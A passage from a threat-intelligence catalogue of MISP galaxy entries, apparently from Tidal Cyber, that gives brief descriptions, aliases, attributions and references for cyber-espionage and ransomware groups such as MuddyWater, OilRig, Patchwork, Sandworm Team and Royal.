Security researchers assess [Moses Staff](https://app.tidalcyber.com/groups/a41725c5-eb3a-4772-8d1e-17c3bbade79c) is politically motivated, and has targeted government, finance, travel, energy, manufacturing, and utility companies outside of Israel as well, including those in Italy, India, Germany, Chile, Turkey, the UAE, and the US.<sup>[[Cybereason StrifeWater Feb 2022](https://app.tidalcyber.com/references/30c911b2-9a5e-4510-a78c-c65e84398c7e)]</sup>

The tag is: misp-galaxy:groups="Moses Staff"

MoustachedBouncer

[MoustachedBouncer](https://app.tidalcyber.com/groups/f31df12e-66ea-5a49-87bc-2bc1756a89fc) is a cyberespionage group that has been active since at least 2014 targeting foreign embassies in Belarus.<sup>[[MoustachedBouncer ESET August 2023](https://app.tidalcyber.com/references/9070f14b-5d5e-5f6d-bcac-628478e01242)]</sup>

The tag is: misp-galaxy:groups="MoustachedBouncer"

Static Kitten - Associated Group

<sup>[[Anomali Static Kitten February 2021](https://app.tidalcyber.com/references/710ed789-de1f-4601-a8ba-32147827adcb)]</sup><sup>[[Trend Micro Muddy Water March 2021](https://app.tidalcyber.com/references/16b4b834-2f44-4bac-b810-f92080c41f09)]</sup>

The tag is: misp-galaxy:groups="Static Kitten - Associated Group"

TEMP.Zagros - Associated Group

<sup>[[FireEye MuddyWater Mar 2018](https://app.tidalcyber.com/references/82cddfa6-9463-49bb-8bdc-0c7d6b0e1472)]</sup><sup>[[Anomali Static Kitten February 2021](https://app.tidalcyber.com/references/710ed789-de1f-4601-a8ba-32147827adcb)]</sup><sup>[[Trend Micro Muddy Water March 2021](https://app.tidalcyber.com/references/16b4b834-2f44-4bac-b810-f92080c41f09)]</sup>

The tag is: misp-galaxy:groups="TEMP.Zagros - Associated Group"

MERCURY - Associated Group

<sup>[[Anomali Static Kitten February 2021](https://app.tidalcyber.com/references/710ed789-de1f-4601-a8ba-32147827adcb)]</sup>

The tag is: misp-galaxy:groups="MERCURY - Associated Group"

Seedworm - Associated Group

<sup>[[Symantec MuddyWater Dec 2018](https://app.tidalcyber.com/references/a8e58ef1-91e1-4f93-b2ff-faa7a6365f5d)]</sup><sup>[[Anomali Static Kitten February 2021](https://app.tidalcyber.com/references/710ed789-de1f-4601-a8ba-32147827adcb)]</sup><sup>[[Trend Micro Muddy Water March 2021](https://app.tidalcyber.com/references/16b4b834-2f44-4bac-b810-f92080c41f09)]</sup>

The tag is: misp-galaxy:groups="Seedworm - Associated Group"

Earth Vetala - Associated Group

<sup>[[Trend Micro Muddy Water March 2021](https://app.tidalcyber.com/references/16b4b834-2f44-4bac-b810-f92080c41f09)]</sup>

The tag is: misp-galaxy:groups="Earth Vetala - Associated Group"

MuddyWater

[MuddyWater](https://app.tidalcyber.com/groups/dcb260d8-9d53-404f-9ff5-dbee2c6effe6) is a cyber espionage group assessed to be a subordinate element within Iran’s Ministry of Intelligence and Security (MOIS).<sup>[[CYBERCOM Iranian Intel Cyber January 2022](https://app.tidalcyber.com/references/671e1559-c7dc-4cb4-a9a1-21776f2ae56a)]</sup> Since at least 2017, [MuddyWater](https://app.tidalcyber.com/groups/dcb260d8-9d53-404f-9ff5-dbee2c6effe6) has targeted a range of government and private organizations across sectors, including telecommunications, local government, defense, and oil and natural gas organizations, in the Middle East, Asia, Africa, Europe, and North America.<sup>[[Unit 42 MuddyWater Nov 2017](https://app.tidalcyber.com/references/dcdee265-2e46-4f40-95c7-6a2683edb23a)]</sup><sup>[[Symantec MuddyWater Dec 2018](https://app.tidalcyber.com/references/a8e58ef1-91e1-4f93-b2ff-faa7a6365f5d)]</sup><sup>[[ClearSky MuddyWater Nov 2018](https://app.tidalcyber.com/references/a5f60f45-5df5-407d-9f68-bc5f7c42ee85)]</sup><sup>[[ClearSky MuddyWater June 2019](https://app.tidalcyber.com/references/9789d60b-a417-42dc-b690-24ccb77b8658)]</sup><sup>[[Reaqta MuddyWater November 2017](https://app.tidalcyber.com/references/ecd28ccf-edb6-478d-a8f1-da630df42127)]</sup><sup>[[DHS CISA AA22-055A MuddyWater February 2022](https://app.tidalcyber.com/references/e76570e1-43ab-4819-80bc-895ede67a205)]</sup><sup>[[Talos MuddyWater Jan 2022](https://app.tidalcyber.com/references/a2d79c6a-16d6-4dbd-b8a5-845dcc36212d)]</sup>

The tag is: misp-galaxy:groups="MuddyWater"

TA416 - Associated Group

The tag is: misp-galaxy:groups="TA416 - Associated Group"

RedDelta - Associated Group

<sup>[[Recorded Future REDDELTA July 2020](https://app.tidalcyber.com/references/e2bc037e-d483-4670-8281-70e51b16effe)]</sup><sup>[[Proofpoint TA416 Europe March 2022](https://app.tidalcyber.com/references/5731d7e4-dd19-4d08-b493-7b1a467599d3)]</sup>

The tag is: misp-galaxy:groups="RedDelta - Associated Group"

BRONZE PRESIDENT - Associated Group

<sup>[[Secureworks BRONZE PRESIDENT December 2019](https://app.tidalcyber.com/references/019889e0-a2ce-476f-9a31-2fc394de2821)]</sup>

The tag is: misp-galaxy:groups="BRONZE PRESIDENT - Associated Group"

Mustang Panda

[Mustang Panda](https://app.tidalcyber.com/groups/4a4641b1-7686-49da-8d83-00d8013f4b47) is a China-based cyber espionage threat actor that was first observed in 2017 but may have been conducting operations since at least 2014. [Mustang Panda](https://app.tidalcyber.com/groups/4a4641b1-7686-49da-8d83-00d8013f4b47) has targeted government entities, nonprofits, religious, and other non-governmental organizations in the U.S., Europe, Mongolia, Myanmar, Pakistan, and Vietnam, among others.<sup>[[Crowdstrike MUSTANG PANDA June 2018](https://app.tidalcyber.com/references/35e72170-b1ec-49c9-aefe-a24fc4302fa6)]</sup><sup>[[Anomali MUSTANG PANDA October 2019](https://app.tidalcyber.com/references/70277fa4-60a8-475e-993a-c74241b76127)]</sup><sup>[[Secureworks BRONZE PRESIDENT December 2019](https://app.tidalcyber.com/references/019889e0-a2ce-476f-9a31-2fc394de2821)]</sup>

The tag is: misp-galaxy:groups="Mustang Panda"

Naikon

[Naikon](https://app.tidalcyber.com/groups/a80c00b2-b8b6-4780-99bb-df8fe921947d) is assessed to be a state-sponsored cyber espionage group attributed to the Chinese People’s Liberation Army’s (PLA) Chengdu Military Region Second Technical Reconnaissance Bureau (Military Unit Cover Designator 78020).<sup>[[CameraShy](https://app.tidalcyber.com/references/9942b6a5-6ffb-4a26-9392-6c8bb9954997)]</sup> Active since at least 2010, [Naikon](https://app.tidalcyber.com/groups/a80c00b2-b8b6-4780-99bb-df8fe921947d) has primarily conducted operations against government, military, and civil organizations in Southeast Asia, as well as against international bodies such as the United Nations Development Programme (UNDP) and the Association of Southeast Asian Nations (ASEAN).<sup>[[CameraShy](https://app.tidalcyber.com/references/9942b6a5-6ffb-4a26-9392-6c8bb9954997)]</sup><sup>[[Baumgartner Naikon 2015](https://app.tidalcyber.com/references/09302b4f-7f71-4289-92f6-076c685f0810)]</sup>

While [Naikon](https://app.tidalcyber.com/groups/a80c00b2-b8b6-4780-99bb-df8fe921947d) shares some characteristics with [APT30](https://app.tidalcyber.com/groups/be45ff95-6c74-4000-bc39-63044673d82f), the two groups do not appear to be exact matches.<sup>[[Baumgartner Golovkin Naikon 2015](https://app.tidalcyber.com/references/5163576f-0b2c-49ba-8f34-b7efe3f3f6db)]</sup>

The tag is: misp-galaxy:groups="Naikon"

NEODYMIUM

[NEODYMIUM](https://app.tidalcyber.com/groups/3a660ef3-9954-4252-8946-f903f3f42d0c) is an activity group that conducted a campaign in May 2016 and has heavily targeted Turkish victims. The group has demonstrated similarity to another activity group called [PROMETHIUM](https://app.tidalcyber.com/groups/cc798766-8662-4b55-8536-6d057fbc58f0) due to overlapping victim and campaign characteristics. <sup>[[Microsoft NEODYMIUM Dec 2016](https://app.tidalcyber.com/references/87c9f8e4-f8d1-4f19-86ca-6fd18a33890b)]</sup> <sup>[[Microsoft SIR Vol 21](https://app.tidalcyber.com/references/619b9cf8-7201-45de-9c36-834ccee356a9)]</sup> [NEODYMIUM](https://app.tidalcyber.com/groups/3a660ef3-9954-4252-8946-f903f3f42d0c) is reportedly associated closely with [BlackOasis](https://app.tidalcyber.com/groups/428dc121-a593-4981-9127-f958ae0a0fdd) operations, but evidence that the group names are aliases has not been identified. <sup>[[CyberScoop BlackOasis Oct 2017](https://app.tidalcyber.com/references/a8224ad5-4688-4382-a3e7-1dd3ed74ebce)]</sup>

The tag is: misp-galaxy:groups="NEODYMIUM"

DustSquad - Associated Group

<sup>[[Security Affairs DustSquad Oct 2018](https://app.tidalcyber.com/references/0e6b019c-cf8e-40a7-9e7c-6a7dc5309dc6)]</sup><sup>[[Securelist Octopus Oct 2018](https://app.tidalcyber.com/references/77407057-53f1-4fde-bc74-00f73d417f7d)]</sup><sup>[[SecurityWeek Nomadic Octopus Oct 2018](https://app.tidalcyber.com/references/659f86ef-7e90-42ff-87b7-2e289f9f6cc2)]</sup>

The tag is: misp-galaxy:groups="DustSquad - Associated Group"

Nomadic Octopus

[Nomadic Octopus](https://app.tidalcyber.com/groups/5f8c6ee0-f302-403b-b712-f1e3df064c0c) is a Russian-speaking cyber espionage threat group that has primarily targeted Central Asia, including local governments, diplomatic missions, and individuals, since at least 2014. [Nomadic Octopus](https://app.tidalcyber.com/groups/5f8c6ee0-f302-403b-b712-f1e3df064c0c) has been observed conducting campaigns involving Android and Windows malware, mainly using the Delphi programming language, and building custom variants.<sup>[[Security Affairs DustSquad Oct 2018](https://app.tidalcyber.com/references/0e6b019c-cf8e-40a7-9e7c-6a7dc5309dc6)]</sup><sup>[[Securelist Octopus Oct 2018](https://app.tidalcyber.com/references/77407057-53f1-4fde-bc74-00f73d417f7d)]</sup><sup>[[ESET Nomadic Octopus 2018](https://app.tidalcyber.com/references/50dcb3f0-1461-453a-aab9-38c2e259173f)]</sup>

The tag is: misp-galaxy:groups="Nomadic Octopus"

IRN2 - Associated Group

<sup>[[Crowdstrike Helix Kitten Nov 2018](https://app.tidalcyber.com/references/3fc0d7ad-6283-4cfd-b72f-5ce47594531e)]</sup>

The tag is: misp-galaxy:groups="IRN2 - Associated Group"

APT34 - Associated Group

This group was previously tracked under two distinct groups, APT34 and OilRig, but was combined due to additional reporting giving higher confidence about the overlap of the activity.<sup>[[Unit 42 QUADAGENT July 2018](https://app.tidalcyber.com/references/320f49df-7b0a-4a6a-8542-17b0f56c94c9)]</sup><sup>[[FireEye APT34 Dec 2017](https://app.tidalcyber.com/references/88f41728-08ad-4cd8-a418-895738d68b04)]</sup><sup>[[Check Point APT34 April 2021](https://app.tidalcyber.com/references/593e8f9f-88ec-4bdc-90c3-1a320fa8a041)]</sup>

The tag is: misp-galaxy:groups="APT34 - Associated Group"

COBALT GYPSY - Associated Group

<sup>[[Secureworks COBALT GYPSY Threat Profile](https://app.tidalcyber.com/references/f1c21834-7536-430b-8539-e68373718b4d)]</sup>

The tag is: misp-galaxy:groups="COBALT GYPSY - Associated Group"

Helix Kitten - Associated Group

The tag is: misp-galaxy:groups="Helix Kitten - Associated Group"

Evasive Serpens - Associated Group

The tag is: misp-galaxy:groups="Evasive Serpens - Associated Group"

OilRig

[OilRig](https://app.tidalcyber.com/groups/d01abdb1-0378-4654-aa38-1a4a292703e2) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.<sup>[[Palo Alto OilRig April 2017](https://app.tidalcyber.com/references/fb561cdd-03f6-4867-b5b5-7e4deb11f0d0)]</sup><sup>[[ClearSky OilRig Jan 2017](https://app.tidalcyber.com/references/f19f9ad4-bb31-443b-9c26-87946469a0c3)]</sup><sup>[[Palo Alto OilRig May 2016](https://app.tidalcyber.com/references/53836b95-a30a-4e95-8e19-e2bb2f18c738)]</sup><sup>[[Palo Alto OilRig Oct 2016](https://app.tidalcyber.com/references/14bbb07b-caeb-4d17-8e54-047322a5930c)]</sup><sup>[[Unit42 OilRig Playbook 2023](https://app.tidalcyber.com/references/e38902bb-9bab-5beb-817b-668a67a76541)]</sup><sup>[[FireEye APT34 Dec 2017](https://app.tidalcyber.com/references/88f41728-08ad-4cd8-a418-895738d68b04)]</sup><sup>[[Unit 42 QUADAGENT July 2018](https://app.tidalcyber.com/references/320f49df-7b0a-4a6a-8542-17b0f56c94c9)]</sup>

The tag is: misp-galaxy:groups="OilRig"

Orangeworm

[Orangeworm](https://app.tidalcyber.com/groups/863b7013-133d-4a82-93d2-51b53a8fd30e) is a group that has targeted organizations in the healthcare sector in the United States, Europe, and Asia since at least 2015, likely for the purpose of corporate espionage.<sup>[[Symantec Orangeworm April 2018](https://app.tidalcyber.com/references/eee5efa1-bbc6-44eb-8fae-23002f351605)]</sup>

The tag is: misp-galaxy:groups="Orangeworm"

Chinastrats - Associated Group

The tag is: misp-galaxy:groups="Chinastrats - Associated Group"

MONSOON - Associated Group

MONSOON is the name of an espionage campaign; we use it here to refer to the actor group behind the campaign. <sup>[[Forcepoint Monsoon](https://app.tidalcyber.com/references/ea64a3a5-a248-44bb-98cd-f7e3d4c23d4e)]</sup> <sup>[[PaloAlto Patchwork Mar 2018](https://app.tidalcyber.com/references/2609e461-1e23-4dc2-aa44-d09f4acb8c6e)]</sup>

The tag is: misp-galaxy:groups="MONSOON - Associated Group"

Operation Hangover - Associated Group

It is believed that the actors behind [Patchwork](https://app.tidalcyber.com/groups/32385eba-7bbf-439e-acf2-83040e97165a) are the same actors behind Operation Hangover. <sup>[[Forcepoint Monsoon](https://app.tidalcyber.com/references/ea64a3a5-a248-44bb-98cd-f7e3d4c23d4e)]</sup> <sup>[[Operation Hangover May 2013](https://app.tidalcyber.com/references/fd581c0c-d93e-4396-a372-99cde3cd0c7c)]</sup>

The tag is: misp-galaxy:groups="Operation Hangover - Associated Group"

Hangover Group - Associated Group

[Patchwork](https://app.tidalcyber.com/groups/32385eba-7bbf-439e-acf2-83040e97165a) and the Hangover Group have both been referenced as aliases for the threat group associated with Operation Monsoon.<sup>[[PaloAlto Patchwork Mar 2018](https://app.tidalcyber.com/references/2609e461-1e23-4dc2-aa44-d09f4acb8c6e)]</sup><sup>[[Unit 42 BackConfig May 2020](https://app.tidalcyber.com/references/f26629db-c641-4b6b-abbf-b55b9cc91cf1)]</sup><sup>[[Forcepoint Monsoon](https://app.tidalcyber.com/references/ea64a3a5-a248-44bb-98cd-f7e3d4c23d4e)]</sup>

The tag is: misp-galaxy:groups="Hangover Group - Associated Group"

Dropping Elephant - Associated Group

The tag is: misp-galaxy:groups="Dropping Elephant - Associated Group"

Patchwork

[Patchwork](https://app.tidalcyber.com/groups/32385eba-7bbf-439e-acf2-83040e97165a) is a cyber espionage group that was first observed in December 2015. While the group has not been definitively attributed, circumstantial evidence suggests the group may be a pro-Indian or Indian entity. [Patchwork](https://app.tidalcyber.com/groups/32385eba-7bbf-439e-acf2-83040e97165a) has been seen targeting industries related to diplomatic and government agencies. Much of the code used by this group was copied and pasted from online forums. [Patchwork](https://app.tidalcyber.com/groups/32385eba-7bbf-439e-acf2-83040e97165a) was also seen operating spearphishing campaigns targeting U.S. think tank groups in March and April of 2018.<sup>[[Cymmetria Patchwork](https://app.tidalcyber.com/references/d4e43b2c-a858-4285-984f-f59db5c657bd)]</sup> <sup>[[Symantec Patchwork](https://app.tidalcyber.com/references/a6172463-56e2-49f2-856d-f4f8320d7c6e)]</sup><sup>[[TrendMicro Patchwork Dec 2017](https://app.tidalcyber.com/references/15465b26-99e1-4956-8c81-cda3388169b8)]</sup><sup>[[Volexity Patchwork June 2018](https://app.tidalcyber.com/references/d3ed7dd9-0941-4160-aa6a-c0244c63560f)]</sup>

The tag is: misp-galaxy:groups="Patchwork"

PittyTiger

[PittyTiger](https://app.tidalcyber.com/groups/60936d3c-37ed-4116-a407-868da3aa4446) is a threat group believed to operate out of China that uses multiple different types of malware to maintain command and control.<sup>[[Bizeul 2014](https://app.tidalcyber.com/references/a4617ef4-e6d2-47e7-8f81-68e7380279bf)]</sup><sup>[[Villeneuve 2014](https://app.tidalcyber.com/references/a156e24e-0da5-4ac7-b914-29f2f05e7d6f)]</sup>

The tag is: misp-galaxy:groups="PittyTiger"

PLATINUM

[PLATINUM](https://app.tidalcyber.com/groups/f036b992-4c3f-47b7-a458-94ac133bce74) is an activity group that has targeted victims since at least 2009. The group has focused on targets associated with governments and related organizations in South and Southeast Asia. <sup>[[Microsoft PLATINUM April 2016](https://app.tidalcyber.com/references/d0ec5037-aa7f-48ee-8d37-ff8fb2c8c297)]</sup>

The tag is: misp-galaxy:groups="PLATINUM"

Play Ransomware Actors

Play is a ransomware operation first observed in mid-2022. Security researchers have observed filename, filepath, and TTP overlaps between Play and the Hive and Nokoyawa ransomware families, which themselves are believed to be linked.<sup>[[Trend Micro Play Playbook September 06 2022](/references/2d2b527d-25b0-4b58-9ae6-c87060b64069)]</sup> According to publicly available ransomware extortion threat data, Play has claimed more than 300 victims from a wide range of sectors on its data leak site since December 2022.<sup>[[GitHub ransomwatch](/references/62037959-58e4-475a-bb91-ff360d20c1d7)]</sup>

The tag is: misp-galaxy:groups="Play Ransomware Actors"

POLONIUM

[POLONIUM](https://app.tidalcyber.com/groups/7fbd7514-76e9-4696-8c66-9f95546e3315) is a Lebanon-based group that has primarily targeted Israeli organizations, including critical manufacturing, information technology, and defense industry companies, since at least February 2022. Security researchers assess [POLONIUM](https://app.tidalcyber.com/groups/7fbd7514-76e9-4696-8c66-9f95546e3315) has coordinated their operations with multiple actors affiliated with Iran’s Ministry of Intelligence and Security (MOIS), based on victim overlap as well as common techniques and tooling.<sup>[[Microsoft POLONIUM June 2022](https://app.tidalcyber.com/references/689ff1ab-9fed-4aa2-8e5e-78dac31e6fbd)]</sup>

The tag is: misp-galaxy:groups="POLONIUM"

Poseidon Group

[Poseidon Group](https://app.tidalcyber.com/groups/553e2b7b-170c-4eb5-812b-ea33fe1dd4a0) is a Portuguese-speaking threat group that has been active since at least 2005. The group has a history of using information exfiltrated from victims to blackmail victim companies into contracting the [Poseidon Group](https://app.tidalcyber.com/groups/553e2b7b-170c-4eb5-812b-ea33fe1dd4a0) as a security firm. <sup>[[Kaspersky Poseidon Group](https://app.tidalcyber.com/references/e53bc63e-986f-4d48-a6b7-ed8e93494ed5)]</sup>

The tag is: misp-galaxy:groups="Poseidon Group"

StrongPity - Associated Group

The name StrongPity has also been used to describe the group and the malware used by the group.<sup>[[Bitdefender StrongPity June 2020](https://app.tidalcyber.com/references/7d2e20f2-20ba-4d51-9495-034c07be41a8)]</sup><sup>[[Talos Promethium June 2020](https://app.tidalcyber.com/references/188d990e-f0be-40f2-90f3-913dfe687d27)]</sup>

The tag is: misp-galaxy:groups="StrongPity - Associated Group"

PROMETHIUM

[PROMETHIUM](https://app.tidalcyber.com/groups/cc798766-8662-4b55-8536-6d057fbc58f0) is an activity group focused on espionage that has been active since at least 2012. The group has conducted operations globally with a heavy emphasis on Turkish targets. [PROMETHIUM](https://app.tidalcyber.com/groups/cc798766-8662-4b55-8536-6d057fbc58f0) has demonstrated similarity to another activity group called [NEODYMIUM](https://app.tidalcyber.com/groups/3a660ef3-9954-4252-8946-f903f3f42d0c) due to overlapping victim and campaign characteristics.<sup>[[Microsoft NEODYMIUM Dec 2016](https://app.tidalcyber.com/references/87c9f8e4-f8d1-4f19-86ca-6fd18a33890b)]</sup><sup>[[Microsoft SIR Vol 21](https://app.tidalcyber.com/references/619b9cf8-7201-45de-9c36-834ccee356a9)]</sup><sup>[[Talos Promethium June 2020](https://app.tidalcyber.com/references/188d990e-f0be-40f2-90f3-913dfe687d27)]</sup>

The tag is: misp-galaxy:groups="PROMETHIUM"

APT2 - Associated Group

The tag is: misp-galaxy:groups="APT2 - Associated Group"

MSUpdater - Associated Group

The tag is: misp-galaxy:groups="MSUpdater - Associated Group"

Putter Panda

[Putter Panda](https://app.tidalcyber.com/groups/6005f4a9-fe26-4237-a44e-3f6cbb1fe75c) is a Chinese threat group that has been attributed to Unit 61486 of the 12th Bureau of the PLA’s 3rd General Staff Department (GSD). <sup>[[CrowdStrike Putter Panda](https://app.tidalcyber.com/references/413962d0-bd66-4000-a077-38c2677995d1)]</sup>

The tag is: misp-galaxy:groups="Putter Panda"

Rancor

[Rancor](https://app.tidalcyber.com/groups/021b3c71-6467-4e46-a413-8b726f066f2c) is a threat group that has led targeted campaigns against the South East Asia region. [Rancor](https://app.tidalcyber.com/groups/021b3c71-6467-4e46-a413-8b726f066f2c) uses politically-motivated lures to entice victims to open malicious documents. <sup>[[Rancor Unit42 June 2018](https://app.tidalcyber.com/references/45098a85-a61f-491a-a549-f62b02dc2ecd)]</sup>

The tag is: misp-galaxy:groups="Rancor"

Rhysida Ransomware Actors

This object represents the behaviors associated with operators of Rhysida ransomware, which is licensed on a ransomware-as-a-service ("RaaS") basis. Various affiliated ransomware operators likely do not operate as a cohesive unit. The Rhysida RaaS operation has been active since May 2023, claiming attacks on multiple sectors in several countries in North and South America, Western Europe, and Australia. Many alleged victims are education sector entities. Security researchers have observed TTP and victimology overlaps with the Vice Society extortion group.<sup>[[HC3 Analyst Note Rhysida Ransomware August 2023](/references/3f6e2821-5073-4382-b5dd-08676eaa2240)]</sup>

Related Vulnerabilities: CVE-2020-1472<sup>[[U.S. CISA Rhysida Ransomware November 15 2023](/references/6d902955-d9a9-4ec1-8dd4-264f7594605e)]</sup>

The tag is: misp-galaxy:groups="Rhysida Ransomware Actors"

Rocke

[Rocke](https://app.tidalcyber.com/groups/71222310-2807-4599-bb92-248eaf2e03ab) is an alleged Chinese-speaking adversary whose primary objective appeared to be cryptojacking, or stealing victim system resources for the purposes of mining cryptocurrency. The name [Rocke](https://app.tidalcyber.com/groups/71222310-2807-4599-bb92-248eaf2e03ab) comes from the email address "rocke@live.cn" used to create the wallet which held collected cryptocurrency. Researchers have detected overlaps between [Rocke](https://app.tidalcyber.com/groups/71222310-2807-4599-bb92-248eaf2e03ab) and the Iron Cybercrime Group, though this attribution has not been confirmed.<sup>[[Talos Rocke August 2018](https://app.tidalcyber.com/references/bff0ee40-e583-4f73-a013-4669ca576904)]</sup>

The tag is: misp-galaxy:groups="Rocke"

Royal Ransomware Actors

Royal is a ransomware group believed to be responsible for hundreds of attacks on victims worldwide, including organizations in critical infrastructure sectors such as manufacturing, communications, healthcare, and education. The actors that comprise the Royal ransomware operation are believed to be former members of other cybercriminal groups linked to Roy/Zeon ransomware, Conti ransomware, and TrickBot. Unlike many of the other most prominent ransomware groups in recent years, the developers of Royal ransomware are not known to lease the malware to affiliates as a service.<sup>[[Kroll Royal Deep Dive February 2023](/references/dcdcc965-56d0-58e6-996b-d8bd40916745)]</sup>

The Royal group often pressures victims into paying ransom demands by threatening to leak data exfiltrated during intrusions. While public data from the [ransomwatch project](https://github.com/joshhighet/ransomwatch) suggest the group has claimed roughly 200 victims since Q4 2022, a November 2023 U.S. government advisory indicated that Royal “has targeted over 350 known victims worldwide” since September 2022, with extortion demands at times exceeding $250 million.<sup>[[GitHub ransomwatch](/references/62037959-58e4-475a-bb91-ff360d20c1d7)]</sup><sup>[[CISA Royal AA23-061A March 2023](/references/81baa61e-13c3-51e0-bf22-08383dbfb2a1)]</sup>

The tag is: misp-galaxy:groups="Royal Ransomware Actors"

RTM

[RTM](https://app.tidalcyber.com/groups/666ab5f0-3ef1-4e74-8a10-65c60a7d1acd) is a cybercriminal group that has been active since at least 2015 and is primarily interested in users of remote banking systems in Russia and neighboring countries. The group uses a Trojan by the same name ([RTM](https://app.tidalcyber.com/software/1836485e-a3a6-4fae-a15d-d0990788811a)). <sup>[[ESET RTM Feb 2017](https://app.tidalcyber.com/references/ab2cced7-05b8-4788-8d3c-8eadb0aaf38c)]</sup>

The tag is: misp-galaxy:groups="RTM"

Telebots - Associated Group

<sup>[[NCSC Sandworm Feb 2020](https://app.tidalcyber.com/references/d876d037-9d24-44af-b8f0-5c1555632b91)]</sup><sup>[[US District Court Indictment GRU Unit 74455 October 2020](https://app.tidalcyber.com/references/77788d05-30ff-4308-82e6-d123a3c2fd80)]</sup><sup>[[UK NCSC Olympic Attacks October 2020](https://app.tidalcyber.com/references/93053f1b-917c-4573-ba20-99fcaa16a2dd)]</sup>

The tag is: misp-galaxy:groups="Telebots - Associated Group"

IRON VIKING - Associated Group

<sup>[[Secureworks IRON VIKING ](https://app.tidalcyber.com/references/900753b3-c5a2-4fb5-ab7b-d38df867077b)]</sup><sup>[[US District Court Indictment GRU Unit 74455 October 2020](https://app.tidalcyber.com/references/77788d05-30ff-4308-82e6-d123a3c2fd80)]</sup><sup>[[UK NCSC Olympic Attacks October 2020](https://app.tidalcyber.com/references/93053f1b-917c-4573-ba20-99fcaa16a2dd)]</sup>

The tag is: misp-galaxy:groups="IRON VIKING - Associated Group"

Voodoo Bear - Associated Group

<sup>[[CrowdStrike VOODOO BEAR](https://app.tidalcyber.com/references/ce07d409-292d-4e8e-b1af-bd5ba46c1b95)]</sup><sup>[[US District Court Indictment GRU Unit 74455 October 2020](https://app.tidalcyber.com/references/77788d05-30ff-4308-82e6-d123a3c2fd80)]</sup><sup>[[UK NCSC Olympic Attacks October 2020](https://app.tidalcyber.com/references/93053f1b-917c-4573-ba20-99fcaa16a2dd)]</sup>

The tag is: misp-galaxy:groups="Voodoo Bear - Associated Group"

ELECTRUM - Associated Group

The tag is: misp-galaxy:groups="ELECTRUM - Associated Group"

BlackEnergy (Group) - Associated Group

The tag is: misp-galaxy:groups="BlackEnergy (Group) - Associated Group"

Quedagh - Associated Group

The tag is: misp-galaxy:groups="Quedagh - Associated Group"

IRIDIUM - Associated Group

<sup>[[Microsoft Prestige ransomware October 2022](https://app.tidalcyber.com/references/b57e1181-461b-5ada-a739-873ede1ec079)]</sup>

The tag is: misp-galaxy:groups="IRIDIUM - Associated Group"

Sandworm Team

[Sandworm Team](https://app.tidalcyber.com/groups/16a65ee9-cd60-4f04-ba34-f2f45fcfc666) is a destructive threat group that has been attributed to Russia’s General Staff Main Intelligence Directorate (GRU) Main Center for Special Technologies (GTsST) military unit 74455.<sup>[[US District Court Indictment GRU Unit 74455 October 2020](https://app.tidalcyber.com/references/77788d05-30ff-4308-82e6-d123a3c2fd80)]</sup><sup>[[UK NCSC Olympic Attacks October 2020](https://app.tidalcyber.com/references/93053f1b-917c-4573-ba20-99fcaa16a2dd)]</sup> This group has been active since at least 2009.<sup>[[iSIGHT Sandworm 2014](https://app.tidalcyber.com/references/63622990-5467-42b2-8f45-b675dfc4dc8f)]</sup><sup>[[CrowdStrike VOODOO BEAR](https://app.tidalcyber.com/references/ce07d409-292d-4e8e-b1af-bd5ba46c1b95)]</sup><sup>[[USDOJ Sandworm Feb 2020](https://app.tidalcyber.com/references/fefa7321-cd60-4c7e-a9d5-c723d88013f2)]</sup><sup>[[NCSC Sandworm Feb 2020](https://app.tidalcyber.com/references/d876d037-9d24-44af-b8f0-5c1555632b91)]</sup>

In October 2020, the US indicted six GRU Unit 74455 officers associated with [Sandworm Team](https://app.tidalcyber.com/groups/16a65ee9-cd60-4f04-ba34-f2f45fcfc666) for the following cyber operations: the 2015 and 2016 attacks against Ukrainian electrical companies and government organizations, the 2017 worldwide [NotPetya](https://app.tidalcyber.com/software/2538e0fe-1290-4ae1-aef9-e55d83c9eb23) attack, targeting of the 2017 French presidential campaign, the 2018 [Olympic Destroyer](https://app.tidalcyber.com/software/073b5288-11d6-4db0-9f2c-a1816847d15c) attack against the Winter Olympic Games, the 2018 operation against the Organisation for the Prohibition of Chemical Weapons, and attacks against the country of Georgia in 2018 and 2019.<sup>[[US District Court Indictment GRU Unit 74455 October 2020](https://app.tidalcyber.com/references/77788d05-30ff-4308-82e6-d123a3c2fd80)]</sup><sup>[[UK NCSC Olympic Attacks October 2020](https://app.tidalcyber.com/references/93053f1b-917c-4573-ba20-99fcaa16a2dd)]</sup> Some of these were conducted with the assistance of GRU Unit 26165, which is also referred to as APT28.<sup>[[US District Court Indictment GRU Oct 2018](https://app.tidalcyber.com/references/56aeab4e-b046-4426-81a8-c3b2323492f0)]</sup>

The tag is: misp-galaxy:groups="Sandworm Team"

Scarlet Mimic

[Scarlet Mimic](https://app.tidalcyber.com/groups/6c1bdc51-f633-4512-8b20-04a11c2d97f4) is a threat group that has targeted minority rights activists. This group has not been directly linked to a government source, but the group’s motivations appear to overlap with those of the Chinese government. While there is some overlap between IP addresses used by [Scarlet Mimic](https://app.tidalcyber.com/groups/6c1bdc51-f633-4512-8b20-04a11c2d97f4) and [Putter Panda](https://app.tidalcyber.com/groups/6005f4a9-fe26-4237-a44e-3f6cbb1fe75c), it has not been concluded that the groups are the same. <sup>[[Scarlet Mimic Jan 2016](https://app.tidalcyber.com/references/f84a5b6d-3af1-45b1-ac55-69ceced8735f)]</sup>

The tag is: misp-galaxy:groups="Scarlet Mimic"

Roasted 0ktapus - Associated Group

<sup>[[CrowdStrike Scattered Spider BYOVD January 2023](https://app.tidalcyber.com/references/d7d86f5d-1f02-54b0-b6f4-879878563245)]</sup>

The tag is: misp-galaxy:groups="Roasted 0ktapus - Associated Group"

Starfraud - Associated Group

<sup>[[U.S. CISA Scattered Spider November 16 2023](/references/9c242265-c28c-4580-8e6a-478d8700b092)]</sup>

The tag is: misp-galaxy:groups="Starfraud - Associated Group"

UNC3944 - Associated Group

<sup>[[U.S. CISA Scattered Spider November 16 2023](/references/9c242265-c28c-4580-8e6a-478d8700b092)]</sup>

The tag is: misp-galaxy:groups="UNC3944 - Associated Group"

Scatter Swine - Associated Group

<sup>[[U.S. CISA Scattered Spider November 16 2023](/references/9c242265-c28c-4580-8e6a-478d8700b092)]</sup>

The tag is: misp-galaxy:groups="Scatter Swine - Associated Group"

Muddled Libra - Associated Group

